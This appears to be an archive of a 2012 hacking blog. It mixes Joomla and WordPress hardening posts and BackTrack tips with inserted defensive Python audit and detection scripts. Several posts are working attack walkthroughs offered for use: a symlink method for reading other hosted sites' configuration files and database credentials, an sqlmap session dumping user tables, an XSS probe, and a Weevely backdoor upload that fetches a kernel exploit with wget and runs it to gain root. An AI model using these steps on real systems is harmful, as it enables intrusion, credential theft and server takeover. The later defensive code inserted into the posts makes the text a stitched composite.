Friday, 31 August 2012

Most Important Steps To Secure Joomla!



Hello guys, today I'm going to tell you the most important steps to secure your Joomla! website. With those steps you can prevent almost 98% of the attacks!
Joomla! is one of the most popular webapps used on the internet, and from my point of view only 5% of them are actually secured! xD
For hackers, when they see a Joomla website on the server, they think it's an easy target (it is an easy target if you didn't secure it!) and start attacking it!

So let's start with our steps! =)



1. Make Your Password Super hard!

Joomla! hashes are hard to crack, but not that hard. A password that is only hard enough to survive login brute-forcing cannot secure your hash from getting cracked if the attacker gets an SQLi in your website.
What I suggest is making your password long and full of special characters, numbers and letters. A hard password would look like the following:

W#W#W.S3cUr!tYg3Ek$.N3t|R0(k$s$z

You might be wondering, how in the hell would I remember this?! o_O
Well, easy: save it on your computer, mobile and somewhere else (in case you lose them) so you can use it when needed!
The above password would take forever to crack; usually hackers will target another site when the hash doesn't crack xD And you can still make it much longer, like copying it, pasting it three times and using that as a password :D

2. Securing From Symlink

For those who don't know what symlink can do: if an attacker gets access to the server, he can make a symbolic link to your configuration file, sign in to your database and then change your password!
What you have to do is change your configuration file permissions to 400. How? Open your cPanel and you can find the option to change the file permissions, OR you can change it over FTP using FileZilla. Another way (most dangerous but best) is uploading a shell on your site and changing the permissions from there! :)
How can I change it with a shell?
Run this command in your public_html directory:

chmod 400 configuration.php

3. Securing From Shell Upload

In Joomla, hackers upload the shell through the media section after allowing the PHP extension in global configuration. What we should do is secure against shell upload even if they somehow have access to the admin panel.
chmod the /images/ directory to 400 when you don't need to upload anything. That will make it non-writable for uploads even if .php is enabled.
Disable your FTP when you are not using it, and avoid open FTP as much as possible. By doing those two things you will prevent many shell upload attempts by any attacker.

4. Scanning And Being Up-To-Date

Scan your website every time you install a plugin, and keep checking exploit databases like 1337day and exploit-db to see if your Joomla has any vulnerabilities.
After installing your Joomla, scan it with JoomScan to see what vulnerabilities it has and patch them before you even launch your website.

5. Fast Tips/Tricks

# NEVER use the same password on two different things related to your website! For example your admin panel and FTP password, database password and FTP password and so on. Don't even use the same password as your email or Facebook!

# DO NOT use "admin" or "administrator" as your username in your website.

# Disable FTP when it's not needed.

# Try to change your admin password every once in a while!

# Check This Link to apply more security stuff!


Monday, 27 August 2012

How To Make 404 Page For Blogger (FULL 404 PAGE)



Hello guys, today I'm going to show you how to make a 404 page for your Blogger blog! I found this way by myself because I really didn't like the 404 ERROR Blogger gives, and wanted to make a full 404 page like normal websites.

So here are the steps in the video below:

1. Make a new blog, call it whatever you want

2. Change to blogger old interface

3. Click on design of the new blog, then Edit Html (Design > Edit HTML)

4. Look at the bottom of the page, you will find "Revert To Classic Template" > Click on that
Now you will be able to change the whole code of the blog, with no errors! in other words fully deface it!

5. Paste your 404 page inside that blog, then save it.

6. Go to your Domain Name host and add that blog as 404.YourWebsite.COM (Note:- You can change to anything not 404.yourwebsite.com, but i thought 404.yourwebsite.com will look better)

7. Now go to Your main blog, click on Settings > Search Preferences 

8. You Will find custom 404 page there, click on "SET" and paste this code in it:



9. Change the link in the Code to your 404 page blog, to redirect the user to it.

Now whenever someone opens a broken link, the Blogger 404 error message will run this JavaScript and redirect him/her to the 404 page!

Now watch this video for more understanding!


               

The code:


-----------------------------------------------------
UPDATED!
After Blogger removed the classic theme, the video above is not fully useful any more. BUT here is the new way to FULLY change the Blogger page (deface it) with the new theme.
1. Click on your blog, and then click on "Template"
2. Scroll down to the bottom of the page until you see something like this:
3. Click on "Revert to classic templates" and you will see something like this:
4. Now click on "Revert to classic template", and you're DONE!
Now you will be able to change the main index :)
Enjoy =)


Friday, 24 August 2012

Hackers Wanted (2008) Full Documentary



This Video is actually one of the best videos I've ever watched. And, I think it's worth taking the time and watching it in full!
I saw this first on a forum (PakistaniSpot) and then someone sent me a link to it again in Hackers Media, so I thought it will be good to watch xD AND yes! I really enjoyed it!
one of the best videos I've watched in a while!
Hope you enjoy it too! =)








Friday, 17 August 2012

Most Important Steps To Secure Wordpress



Hello guys, today I'm going to tell you the most important steps to have a more secure WordPress blog.
I think WordPress is the most used webapp on cyber now; however, it's almost the easiest to be hacked and defaced!
But, on the other hand, securing your WordPress is so easy, especially on Linux servers.

Note:- This tut will be based on Linux commands; if you're a Windows server user this tutorial is not completely for you!

So let's start with our steps!

1. Harder & Longer Password
WordPress hashes are so hard to crack (hardest for me xD), so making your password harder than "123456", "admin", "password" could help you A LOT!
The first thing a hacker would do is guess your password; if he fails he'll brute-force it!
A hard password can save you from almost 50% of the attacks! (in my point of view)
When we say "hard password" it means using special characters like (@, (), [], {}, ^, %, $, #, !) and so on.
A longer password would not only secure you from brute-forcing: even if you have a vulnerability like SQL injection and the attacker gets the hash of your password (which is long and full of special characters), it would be hard as hell to crack, and it will take them forever!

2. Securing From Symlink
Symlink is the most common way of hacking nowadays, and securing your website from it will help you much!
Those who don't know what symlinking is can read my Symlink tutorial here.
Now, to secure your blog from this kind of attack, you just have to change the permissions of your configuration file. You can do that through FTP, cPanel, a shell, etc.
Just change the configuration file (wp-config.php in your case =) ) to 400.
You can do that in a shell by running this command:
chmod 400 wp-config.php
The other ways are easy: just press on the option and change it (in FTP and cPanel),
and always remember to remove your shell as soon as you finish working on it! xD
Chmoding this file to 400 will not allow the attacker to read your configuration file from another user! And that's about it :P


3. Securing From Defacing
If a hacker managed to get into your admin panel (somehow o.O), maybe through a Trojan on your PC or something, you should close all the ways that let him upload a shell or deface your website!
What you can do is change the permissions of all the pages (index.php, 404.php, footer.php, etc.) in the theme to 400 (Example: chmod 400 page.php), or do it through your FTP or cPanel, because if those files are writable there is a big chance that the attacker changes their source to a shell's source code and defaces you.
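To check that the permission changes from steps 2 and 3 (and from the same steps in the Joomla! post) are actually in place, here is an audit sketch. It is an added example, not code from the original posts; the function names, the `LOCKED_DIRS` layout and the sample tree are assumptions for illustration.

```python
import os
import stat
import tempfile

CONFIG_NAMES = {"configuration.php", "wp-config.php"}  # file names from the posts
LOCKED_DIRS = ("images", "wp-content/themes")          # assumed default layout
ANY_WRITE = stat.S_IWUSR | stat.S_IWGRP | stat.S_IWOTH


def audit_docroot(docroot, locked_dirs=LOCKED_DIRS):
    """Return sorted (relative path, octal mode, problem) tuples.

    Mode 400 keeps other accounts out; it assumes PHP runs as the file's
    owner (an assumption about the host), and the owner can chmod it back.
    """
    locked = [os.path.join(docroot, d) for d in locked_dirs]
    findings = []
    for base, dirs, files in os.walk(docroot):  # symlinked dirs are not entered
        for name in dirs + files:
            path = os.path.join(base, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # a link's own mode says nothing; links need a separate check
            mode = stat.S_IMODE(st.st_mode)
            rel = os.path.relpath(path, docroot)
            in_locked = any(path == d or path.startswith(d + os.sep) for d in locked)
            if stat.S_ISREG(st.st_mode) and name in CONFIG_NAMES:
                if mode != 0o400:
                    findings.append((rel, "%03o" % mode, "config file is not mode 400"))
            elif in_locked and mode & ANY_WRITE:
                findings.append((rel, "%03o" % mode, "writable inside a locked directory"))
    return sorted(findings)


def build_sample(root):
    """Constructed sample: a WordPress-style docroot with typical default modes."""
    os.makedirs(os.path.join(root, "wp-content", "themes", "demo"))
    os.makedirs(os.path.join(root, "images"))
    for rel in ("wp-config.php", "index.php", "wp-content/themes/demo/index.php"):
        path = os.path.join(root, rel)
        with open(path, "w") as fh:
            fh.write("<?php // constructed sample\n")
        os.chmod(path, 0o644)
    for rel in ("images", "wp-content", "wp-content/themes", "wp-content/themes/demo"):
        os.chmod(os.path.join(root, rel), 0o755)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        build_sample(root)
        for rel, mode, problem in audit_docroot(root):
            print("%-36s %s  %s" % (rel, mode, problem))
```

The audit only reports; it changes nothing. Run it again after every plugin or theme update, because installers commonly reset modes.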

4. Vulnerability Discovering & Finding And Removing

Scan it every month just to check if any plugin has a vulnerability. That will make you faster than the hacker: you discover the vulnerability and patch it before someone else exploits it.
The second thing you want to do is stay up to date with 1337day.com and the WordPress forums; they post any discovered vulnerability and sometimes its patches. This will help you to be less exploitable (I guess xD)

5. Some Quick Tips

# NEVER EVER use the same password in two different things related to your website for example your Database's password and Cpanel's password, website's password and Database's password.
Always use different passwords

# Disable FTP when there is no use of it

# Don't use "admin" or "administrator" as your username

# Change Admin's Panel password every two weeks or so

# Read this article on Wordpress official website (Click Here) For more security


Following the above steps can prevent almost 98% of the attacks on your wordpress blog :)
Hope you liked it!
thanks for reading.


Tuesday, 14 August 2012

Symlink Tutorial





Hello Guys, Today I'm going to explain how to symlink websites in two different methods.
So Lets Start!

[#] Explanation
First I will explain what symlink can do. Symlinking is making symbolic links to other websites on the same server to read their configuration files, connect to their database, and get the information needed to get access to their control panel.
and that's about it :)



[#] Method #1

After uploading your shell on the server, make a directory with the command below:

mkdir sym


NOTE:- The directory can be called whatever you want, just change the "sym" to any name.

Enter your new directory, then upload OR create a file called ".htaccess" in the new directory with the code below inside it:


Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
Like this picture:

After that, we will run the command below to create a symlink to the "/" directory:
ln -s / root
and it will look like this:


And if we opened the directory "sym" from our browser like "www.website.com/sym"
it should look like this:
in the image above my shell was in /downloads so I made "sym" directory inside /downloads

and our process is almost done, now we just have to get the user of the target website.
I've provided user.php code in the bottom of the post, this script will give you all the websites on the server and their username.

when you get the username of your target, just open the link like this:

www.website.com/sym/root/home/(user)/public_html
where (user) = the user of the target
here is a picture for example:

where the user was "hillock"

Now the next step is easy: we will start looking for the configuration file; it's usually called config.php or configuration.php.
Here are the locations of the configuration files in the most famous webapps out there.


vBulletin -- /includes/config.php
IPB -- /conf_global.php
MyBB -- /inc/config.php
Phpbb -- /config.php
Php Nuke -- /config.php
Php-Fusion -- config.php
SMF -- /Settings.php
Joomla -- configuration.php , configuration.php-dist
WordPress -- /wp-config.php
Drupal -- /sites/default/settings.php
Oscommerce -- /includes/configure.php
e107 -- /e107_config.php
Seditio -- /datas/config.php


When you find the configuration file, it will contain the database details.
It will look like the image below (the image below is a Joomla configuration file):

Now upload SQL.php (code provided below)
and connect to the database.
Congrats :) now you can get all the details from the admin table, and even change them.

[#] Method #2

In this method, we won't symlink the root directory; we will symlink the target's public_html dir directly.
To do this, just follow these steps:
1. Make a new directory, just like method 1
2. Make ".htaccess" OR upload it with the code below:

Options Indexes FollowSymlinks
DirectoryIndex z0mbie.htm
AddType txt .php
AddHandler txt .php

3. Run the following command:

ln -s /home/(user)/public_html (user)

where (user) = the target's user
and it will look like this when we open it in our browser:
in the picture the user name of my target was "csseipsn"
now you just have to find the configuration and connect :)

Scripts Needed:

User.php Source Code
SQL.php Source Code

FOR EDUCATIONAL PURPOSE ONLY!
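Both methods leave the same two artefacts in an account's web root: a symbolic link that resolves outside that account's home, and an .htaccess that serves .php files as text. The following detection sketch for a shared host looks for both. It is an added example, not part of the original post; the function names, the `PHP_AS_TEXT` pattern and the constructed two-account layout are assumptions for illustration.

```python
import os
import re
import tempfile

# AddType/AddHandler lines that make Apache return PHP source as plain text,
# as in the .htaccess samples in the post.
PHP_AS_TEXT = re.compile(r"^\s*(AddType|AddHandler)\s+(text/plain|txt)\s.*\.php\b", re.I)


def find_escaping_symlinks(account_home):
    """List (link, resolved target) for links that resolve outside account_home."""
    home = os.path.realpath(account_home)
    hits = []
    for base, dirs, files in os.walk(home):  # os.walk never descends into links
        for name in dirs + files:
            path = os.path.join(base, name)
            if not os.path.islink(path):
                continue
            target = os.path.realpath(path)
            if os.path.commonpath([home, target]) != home:
                hits.append((os.path.relpath(path, home), target))
    return sorted(hits)


def find_php_as_text(account_home):
    """List (.htaccess path, line number, directive) that remap .php to text."""
    home = os.path.realpath(account_home)
    hits = []
    for base, dirs, files in os.walk(home):
        path = os.path.join(base, ".htaccess")
        if ".htaccess" not in files or os.path.islink(path):
            continue
        with open(path, errors="replace") as fh:
            for lineno, line in enumerate(fh, 1):
                if PHP_AS_TEXT.match(line):
                    hits.append((os.path.relpath(path, home), lineno, line.strip()))
    return sorted(hits)


def build_constructed_host(root):
    """Constructed layout: two accounts; alice's web root holds the artefacts."""
    alice = os.path.join(root, "home", "alice")
    bob_www = os.path.join(root, "home", "bob", "public_html")
    sym = os.path.join(alice, "public_html", "sym")
    os.makedirs(sym)
    os.makedirs(bob_www)
    os.makedirs(os.path.join(alice, "public_html", "releases"))
    os.symlink("/", os.path.join(sym, "root"))
    os.symlink(bob_www, os.path.join(sym, "bob"))
    # A legitimate link that stays inside the account must not be reported.
    os.symlink("releases", os.path.join(alice, "public_html", "current"))
    with open(os.path.join(sym, ".htaccess"), "w") as fh:
        fh.write("Options Indexes FollowSymlinks\nDirectoryIndex z0mbie.htm\n"
                 "AddType txt .php\nAddHandler txt .php\n")
    return alice


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        home = build_constructed_host(root)
        for link, target in find_escaping_symlinks(home):
            print("symlink  %s -> %s" % (link, target))
        for path, lineno, text in find_php_as_text(home):
            print("htaccess %s:%d  %s" % (path, lineno, text))
```

On Apache, the server-side control against this is `SymLinksIfOwnerMatch` in place of `FollowSymLinks`, together with an `AllowOverride` setting that does not let accounts change `Options` from .htaccess.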


Monday, 13 August 2012

How To Connect To A Server Via Weevely Backdoor






Hello Guys,
today I have another video for you on how to connect to a server via weevely!

weevely is a PHP backdoor.
and from this tutorial you can get better understanding about my R00ting with weevely Tutorial :)

so here is the video, hope you like it!




           
Best Played In Full Screen Mode!

Enjoy :)



Sunday, 12 August 2012

Basic XSS understanding





Hello guys,
today I'm going to try to give you my basic understanding of XSS attacks.
There are two types of XSS attacks, which are:

1. Non-Persistent XSS

2. Persistent XSS



First, the Non-Persistent one is when you add your text like this:

www.website.com/search.php?search=Troll3d 

and the site shows something like:

"Search Result For Troll3d"


When we see that the text is displayed on the page with no validation,

we then try to put in some HTML tags like:

www.website.com/search.php?search=Tr0ll3d
or some JavaScript like:

www.website.com/search.php?search=<script>alert("Tr0ll3d");</script>
If we get blinking text, or the JavaScript runs successfully, that means we can display anything we want, but that's not that dangerous for the website.
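The reflected case above, shown as server-side rendering with and without output encoding. This is an added example, not code from the original post: the Python functions and the `value=` attribute are assumptions standing in for search.php, and the third probe is a constructed input.

```python
import html
import re


def render_search_vulnerable(query):
    """What the post describes: the parameter is echoed into the page as-is."""
    return ('<h1>Search Result For %s</h1>\n'
            '<input name="search" value="%s">' % (query, query))


def render_search_encoded(query):
    """Same page, with the value HTML-encoded before it reaches the markup.

    quote=True also encodes " and ', which matters for the attribute context.
    """
    safe = html.escape(query, quote=True)
    return ('<h1>Search Result For %s</h1>\n'
            '<input name="search" value="%s">' % (safe, safe))


def survives_unencoded(render, probe):
    """True if a probe containing HTML metacharacters comes back verbatim."""
    if not re.search(r"[<>\"'&]", probe):
        return False  # plain text has nothing to encode
    return probe in render(probe)


PROBES = [
    "Troll3d",                                # plain text from the post
    '<script>alert("Tr0ll3d");</script>',     # script probe from the post
    'Tr0ll3d" data-x="1',                     # constructed: breaks out of value=""
]

if __name__ == "__main__":
    for probe in PROBES:
        print("%-40r raw echo: %-5s encoded: %s" % (
            probe,
            survives_unencoded(render_search_vulnerable, probe),
            survives_unencoded(render_search_encoded, probe)))
```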

The second type is Persistent XSS. This one is more dangerous: it allows us to inject our code into the website's source, and with just a little knowledge of JavaScript you can even deface the website in extreme cases.
For Persistent XSS, I found a perfect video from OWASP tutorials which I learned XSS from (today, after I got a request to make this tut xD)


Hope it was useful  for you guys :)
enjoy


Saturday, 11 August 2012

Tips To Improve Backtrack






Hello everyone
As many people say, "BackTrack is hard to use" or "BackTrack is not for daily use", but today I'm going to give you some tips to make BackTrack perfect for your daily use, even on KDE (which is harder to use than GNOME)



1. To make installing software much easier, and searching for software easier too, run this command:


apt-get install software-center

This command will install "Ubuntu Software Center", where you can search for software and install it with just one click


2. To install the best messengers on Linux run this command:



apt-get install empathy && apt-get install pidgin

With those two you can connect and chat on Yahoo, MSN, Facebook, Jabber (like Nimbuzz and mig33), and much more! I would install them both and try them to see which one is best for my use, but those two are my personal best xP



3. For screen recording, install XVidCap by running this command:


apt-get install xvidcap

This one has good quality; I used it a couple of times and liked it


4. TeamViewer: it can be downloaded from teamviewer.com and then installed with the following commands:


root@bt:~# cd Downloads

root@bt:~/Downloads# dpkg -i teamviewer_linux*.deb



5. For archive extraction (ALMOST ALL TYPES) install Ark by running this command:


apt-get install ark

I really like it; .rar, .zip, .tar, etc., it can extract them!
You can also install "unrar" and "zip" by running the commands below:


apt-get install zip
apt-get install unrar



6. Installing VLC, which I failed at when I first used BackTrack,
but it's the only player which can play .avi and .mpeg ... anyways,
here is a video tutorial on how to install it and make it run as root (tut made by me xP)


How To Run VLC As Root



7. And now Google Chrome, my fav browser, which can't be opened as root; but here is a tut on how to fix this error and make it run smoothly as root


How To Run Google Chrome As Root

tut made by me as well xP



8. FTP client for Linux, my personal best: FileZilla. Run the command below:


apt-get install filezilla



9. Now this one is for personal use: an office package just like Microsoft Word and PowerPoint, but the open source version lol. Run the command below:


apt-get install openoffice.org

This command will install the whole package.



10. PDF reader, if it is not installed already. Run this command:


apt-get install xpdf



11. To install Windows-based programs (not all, just the most important) we will get "winetricks", which is now available in a GUI version. To make it ready to use, run these commands:


root@bt:~# wget http://winetricks.org/winetricks
root@bt:~# chmod +x winetricks

And then to use it, just open the terminal and type:

root@bt:~# ./winetricks
(make sure that it's in the same dir as you are, by running the command "ls" to check that it is there)



12. To run VB .NET programs you have two options (do them both just to be sure):
installing "mono" by running this command:


apt-get install mono-complete
(mono is also used for development, not only for running programs)
To run a program using mono type this:


mono PROGRAM-NAME.exe

Be sure to make the program executable using the following command:


chmod +x PROGRAM-NAME.exe

IF MONO DIDN'T WORK, we have another option, which is installing the .NET framework using "winetricks".
Open a terminal, enter the dir that has winetricks and then run this command:


./winetricks corefonts dotnet20

After it's done, all you have to do is right-click on the program you want and then choose "open with wine windows program loader" from the menu.

Now finally just update and upgrade your system by running this command:


apt-get update && apt-get upgrade && apt-get moo


that's it
enjoy using backtrack now :)


Friday, 10 August 2012

How To Run Google Chrome As Root In Linux




Hello guys :)
here is another video on how to run a program as root in Linux, but this time it's Google Chrome (the best, and my fav :P )
It's a video tutorial as usual, hope you like it :)



          
Best Played At Full Screen!


How To Run Tor Browser As Root In Linux




Hello guys, today I'm going to show you how to run Tor Browser as root in Linux (BackTrack in the video). I made this video because many people were asking how to get a VPN on BackTrack, because most of them don't work, so here is a tutorial on how to make Tor work in BackTrack :)

         

             
Best Played At Full Screen Mode!


How to Run VLC player as Root On Linux



Hello guys, today I'm going to show you how to fix VLC and run it as root in Linux distros.
I made this video because I faced the same problem when I first switched to BackTrack, which always uses root, so I found the way, and here it is in the video :P

Best Played At Full Screen Mode!


SQLmap Tutorial




Hello again guyz :)
Today I'm going to show you how to hack an SQL vuln. site with SQLmap in BackTrack 5.
First of all find a vuln. site, or test our own sites by adding a single quote at the end of our link => '
I assume that you have basic knowledge about SQL injection before reading this tutorial :P
Second of all open BackTrack > Terminal; then type
cd /pentest/database/sqlmap
hit Enter.
Now we are inside SQLmap, let's start hacking :P

####################################################################



Now the options we will need here are:

+++++++++++++++++++++++++++++++++++++++++
-D         <= define the database
-T          <= define the table
-C          <= define the column
--dbs     <= bring DataBases names
--tables  <= bring table names
--columns <=bring columns names
--dump    <= dump the data out of the column
++++++++++++++++++++++++++++++++++++++++++

###################################################################



Lets start :)

our first command will be:
./sqlmap.py -u www.website.com/index.php?id=13 --dbs    <= Example!
 it will look like:
then we will get the Databases names like:
now we will ask for tables from any of those databases with --tables
now we have to select the database with "-D" and ask for the tables with "--tables" :)
so we will type:
./sqlmap.py -u www.website.com/index.php?id=13 -D database_name --tables
I choose walnut_live database so I typed:
 and the results will be the tables name of course :P
it will look like:
now we got the tables and found the users table!!
Now we will select this table with the "-T" option, and of course we already selected our database. So we write the same command, but we replace "--tables" with "-T" table_name (which is the "users" table) and then ask for the columns inside that table with the "--columns" option. It will be like:
./sqlmap.py -u www.website.com/index.php?id=13 -D database_name -T table_name --columns
it will look like:
 now we will get the results, the columns
they will come like this:
as you can see we got "id, pass, and user" columns
Now we want the data from them, so we will dump the data :P with "--dump".
But here we have two ways to get it:
we can dump all the data at once, or select the column and get the data from
I will show you how both of them look and how they are used.

first we can get all the data by this command:
./sqlmap.py -u www.website.com/index.php?id=13 -D database_name -T table_name --dump
which will get us all the data at once and will look like this:
 and the result is:
In the picture I marked the user and pass :)
now we will try getting them one by one with this command:
./sqlmap.py -u www.website.com/index.php?id=13 -D database_name -T table_name -C column_name --dump
for example I will get user and pass:

User::

 result::
pass::
result::
######################################################################

we are done!!
we got the User, and Password :)
have fun

FOR EDUCATIONAL PURPOSE ONLY
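Why the single-quote test at the start of this tutorial works, and the fix on the application side. This is an added example, not part of the original post: the `articles` table, the function names and the SQLite in-memory database are assumptions for illustration; the `users` table with `id`, `user` and `pass` mirrors the columns named above, filled with constructed values.

```python
import re
import sqlite3


def open_constructed_db():
    """In-memory database with constructed rows, standing in for the site's DB."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, user TEXT, pass TEXT);
        INSERT INTO articles VALUES (13, 'Constructed article');
        INSERT INTO users VALUES (1, 'admin', 'constructed-hash');
    """)
    return db


def article_concatenated(db, raw_id):
    """Vulnerable pattern behind index.php?id=13: input is pasted into the SQL text."""
    sql = "SELECT title FROM articles WHERE id = " + raw_id
    return db.execute(sql).fetchall()


def article_parameterized(db, raw_id):
    """Hardened: accept only a short run of ASCII digits, then bind it as a value."""
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        return None  # rejected before any SQL runs
    return db.execute("SELECT title FROM articles WHERE id = ?",
                      (int(raw_id),)).fetchall()


def classify(lookup, db, raw_id):
    """Summarise how a lookup function reacts to one raw id parameter."""
    try:
        rows = lookup(db, raw_id)
    except sqlite3.Error:
        # The database tried to parse the visitor's input as SQL: the quote
        # test from the tutorial has found an injection point.
        return "sql-error"
    if rows is None:
        return "rejected"
    return "rows:%d" % len(rows)


if __name__ == "__main__":
    db = open_constructed_db()
    for raw in ("13", "13'"):
        print("%-5r concatenated=%-10s parameterized=%s" % (
            raw,
            classify(article_concatenated, db, raw),
            classify(article_parameterized, db, raw)))
```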


Rooting A Server With Weevely





Hello again guyz,

Today I'm going to show you how to R00t a server with Weevely in BackTrack.
First of all open Weevely:
Menu > BackTrack > Maintaining Access > Web Backdoors > Weevely
Or
Open Terminal and type:
root@root: cd /pentest/backdoor/web/weevely

############################################################



Now lets make our backdoor by typing:
root@root:./main.py -g -o /root/Desktop/backdoor.php -p password
 by typing this command, we made a backdoor called 'backdoor.php' with the password: 'password'

++++++++++++++++++++++Commands We Need++++++++++++++++++++++++++
-g  = Generate backdoor
-o  = Output
-p  = Password
-u  = URL
-t  = start Terminal session
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Steps:


Uploading our backdoor & connecting to it.
Checking the Kernel & Finding LocalR00t for it.
Compiling The LocalR00t
Executing..
###########################################################################
Lets start:


Open your shell and upload the backdoor:

The link to the backdoor will be the same as shell: For Example:
www.target.com/uploads/shell.php           <== shell
www.target.com/uploads/backdoor.php   <== backdoor

Connect to the backdoor by typing:
 ./main.py -t -u http://www.target.com/uploads/backdoor.php -p password

root@root:/pentest/backdoors/web/weevely# ./main.py -t -u http://www.target.com/backdoor.php -p password
  Weevely 0.3 - Generate and manage stealth PHP backdoors.
  Copyright (c) 2011-2012 Weevely Developers
  Website: http://code.google.com/p/weevely/

+ Using method 'system()'.
+ Retrieving terminal basic environment variables .

[hacker@target.com/]
Now to find the kernel version type:
uname -a
[hacker@target.com/] uname -a
2.6.18 (example)

 Now we have to find the localroot for that kernel in :
www.1337day.com
www.exploit-db.com
www.google.com
and some others..

Now we go to the directory /tmp/, because it's always writable.
Now let's say the kernel was 2.6.18.
There are some ways to get the localroot:
uploading through shell
wget method
curl
Now let me explain how each method works:

Of course you know how to upload through the shell :P

wget
wget www.exploit.com/2.6.18.c
curl
curl www.exploit.com/2.6.18.c -o new_name

for this TUT we will use WGET


############################################


[hacker@target.com/tmp/]ls
file
file1
anything
[hacker@target.com/tmp/]wget www.exploit.com/2.6.18.c
--2012-01-29 05:43:37--  http://1337day.com/exploits/17158
Resolving exploitcom... 127.1.1
Connecting to exploit.com|127.1.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: `2.6.18.c'

     0K .........                                               208M=0s

2012-01-29 05:43:38 (208 MB/s) - `2.6.18.c' saved [9396]
 [hacker@target.com/tmp/]ls
 2.6.18.c
 file
 file1
 anything
#############################################
ok, now the exploit is on the server, we have to compile it by this command:
gcc 2.6.18.c -o zombie
[hacker@target.com/tmp/]gcc 2.6.18.c -o zombie


[hacker@target.com/tmp/]ls
 2.6.18.c
 file
 file1
 anything
 zombie

++++++++++++++++
chmod 777 zombie
++++++++++++++++
[hacker@target.com/tmp/]chmod 777 zombie

++++++++++++++++
executing..
++++++++++++++++

[hacker@target.com/tmp/]./zombie
.
.
.
.
.
done!
[hacker@target.com/tmp/]id
uid=(root) gid=(root)

R00ted!

FOR EDUCATIONAL PURPOSE ONLY